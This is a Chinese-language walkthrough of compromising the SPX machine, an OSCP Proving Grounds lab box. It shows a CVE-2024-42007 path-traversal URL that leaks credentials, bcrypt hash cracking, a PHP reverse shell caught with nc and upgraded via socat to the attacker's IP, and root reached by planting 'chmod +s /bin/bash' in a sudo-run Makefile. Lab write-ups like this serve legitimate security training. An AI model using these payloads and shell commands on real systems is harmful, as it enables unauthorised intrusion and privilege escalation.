OSCP - Proving Grounds - SPX

最新推荐文章于 2025-08-05 18:49:56 发布

原创最新推荐文章于 2025-08-05 18:49:56 发布 · 656 阅读

12 ·

CC 4.0 BY-SA版权

文章标签：

#网络安全 #安全性测试 #安全

OSCP 专栏收录该内容

75 篇文章

订阅专栏

主要知识点

PHP插件漏洞，本地文件包含
make install 提权

具体步骤

首先nmap开始，看起来安装了一个Tiny File Manager，不过尝试了默认密码组合，都不好用，弱密码也不行，应该继续看一下

Starting Nmap 7.95 ( https://nmap.org ) at 2024-10-25 15:20 China Standard Time
Stats: 0:01:20 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 32.68% done; ETC: 15:24 (0:02:37 remaining)
Stats: 0:03:46 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 96.06% done; ETC: 15:24 (0:00:09 remaining)
Nmap scan report for 192.168.207.108
Host is up (0.075s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
|_  256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Tiny File Manager
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

执行路径爆破,尝试了多个字典文件，也只是发现了phpinfo.php

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.207.108
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                C:\Users\Administrator\Documents\tools\SecLists-2024.3\SecLists-2024.3\Discovery\Web-Content\quickhits.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
......
......
/index.phps           (Status: 403) [Size: 280]
/phpinfo.php          (Status: 200) [Size: 74734]
/server-status/       (Status: 403) [Size: 280]
Progress: 2565 / 2566 (99.96%)
===============================================================
Finished
===============================================================

不过在phpinfo文件里找到了SPX，有版本号，也有key

找到了该版本的SPX有本地文件包含漏洞Novel Escape from the SPX jungle - Path traversal in PHP-SPX (CVE-2024-42007) - vsociety

仔细读一下，发现可以使用 192.168.126.108/index.php?SPX_KEY=a2a90ca2f9f0ea04d267b16fb8e63800&SPX_UI_URI=%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fvar%2fwww%2fhtml%2findex.php来下载index.php

在index.php中发现了用户名和密码的hash

$auth_users = array(
    'admin' => '$2y$10$7LaMUa8an8NrvnQsj5xZ3eDdOejgLyXE8IIvsC.hFy1dg7rPb9cqG',
    'user' => '$2y$10$x8PS6i0Sji2Pglyz7SLFruYFpAsz9XAYsdiPyfse6QDkB/QsdShxi'
);

尝试用john爆破一下，得到了两个密码，其中admin用户的密码是 lowprofile

C:\home\kali\Documents\OFFSEC\GoToWork\SPX> john --wordlist=/usr/share/wordlists/rockyou.txt  password1.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:10:00 0.45% (ETA: 2024-12-28 22:34) 0g/s 129.3p/s 129.3c/s 129.3C/s wazup1..tyisha
0g 0:00:10:02 0.45% (ETA: 2024-12-28 22:34) 0g/s 129.4p/s 129.4c/s 129.4C/s skyliner..shawn5
0g 0:00:10:03 0.45% (ETA: 2024-12-28 22:33) 0g/s 129.4p/s 129.4c/s 129.4C/s romeo11..regiment
profiler         (?)     
1g 0:00:15:26 DONE (2024-12-27 09:51) 0.001079g/s 131.9p/s 131.9c/s 131.9C/s proper..powerofthree
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                                                                                                                                                     
C:\home\kali\Documents\OFFSEC\GoToWork\SPX> john --wordlist=/usr/share/wordlists/rockyou.txt  password2.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
lowprofile       (?)     
1g 0:00:27:01 DONE (2024-12-27 10:18) 0.000616g/s 133.9p/s 133.9c/s 133.9C/s lozano1..loverich
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

复制一个php reverse shell文件，更改ip/端口后上传到Tiny File Manager

直接访问php-revese-shell.php ,反弹shell创建成功（当反弹shell创建不成功的时候，如果不是防火墙问题，基本就是vpn问题，可以重启vpn）

虽然成功的创建了reverse shell,但是没有Python，无法成功创建full tty,也就无法调用一些命令，比如sudo -l,在这台靶机上很重要。

C:\home\kali\Documents\OFFSEC\GoToWork\SPX> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.173] from (UNKNOWN) [192.168.126.108] 53896
SOCKET: Shell has connected! PID: 52895
whereis python
python:

另外，home路径下存在一个profiler用户，尝试了一下，没有密码，所以只能用手里有的profile和lowprofiler密码来尝试，居然成功了

su profiler
Password: lowprofile
id
uid=1000(profiler) gid=1000(profiler) groups=1000(profiler)

现在我们上传一个socat到remote server后，在本地执行

C:\home\kali\Documents\OFFSEC\GoToWork\SPX> socat file:`tty`,raw,echo=0 tcp-listen:1234

在remote server上执行

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
bash: line 5: socat: command not found
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.45.173:1234

这时新的带有full tty的reverse shell创建成功，并且发现可以sudo make install php-spx

C:\home\kali\Documents\OFFSEC\GoToWork\SPX> socat file:`tty`,raw,echo=0 tcp-listen:1234
profiler@spx:/tmp$ id
uid=1000(profiler) gid=1000(profiler) groups=1000(profiler)
profiler@spx:/tmp$ sudo -l
[sudo] password for profiler: 
Matching Defaults entries for profiler on spx:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User profiler may run the following commands on spx:
    (ALL) /usr/bin/make install -C /home/profiler/php-spx

这里我们修改一下/home/profiler/php-spx/Makefile,在install-modules section下面增加chmod +s /bin/bash的命令

install-modules: build-modules
        @test -d modules && \
        $(mkinstalldirs) $(INSTALL_ROOT)$(EXTENSION_DIR)
        @echo "Installing shared extensions:     $(INSTALL_ROOT)$(EXTENSION_DIR)/"
        @echo "Chmod +s /bin/bash"
        @chmod +s /bin/bash
        @rm -f modules/*.la >/dev/null 2>&1
        @$(INSTALL) modules/* $(INSTALL_ROOT)$(EXTENSION_DIR)

这时运行sudo /usr/bin/make install -C /home/profiler/php-spx则会发现 /bin/bash已经具备SUID了，提权成功

profiler@spx:~/php-spx$ sudo /usr/bin/make install -C /home/profiler/php-spx
make: Entering directory '/home/profiler/php-spx'
Installing shared extensions:     /usr/lib/php/20210902/
Chmod +s /bin/bash
Installing SPX web UI to: /usr/share/misc/php-spx/assets/web-ui
make: Leaving directory '/home/profiler/php-spx'
profiler@spx:~/php-spx$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1396520 Mar 14  2024 /bin/bash
profiler@spx:~/php-spx$ /bin/bash -p
bash-5.1# cat /root/proof.txt
e6d4f6bb0c478a658b361d95c1b51145
bash-5.1#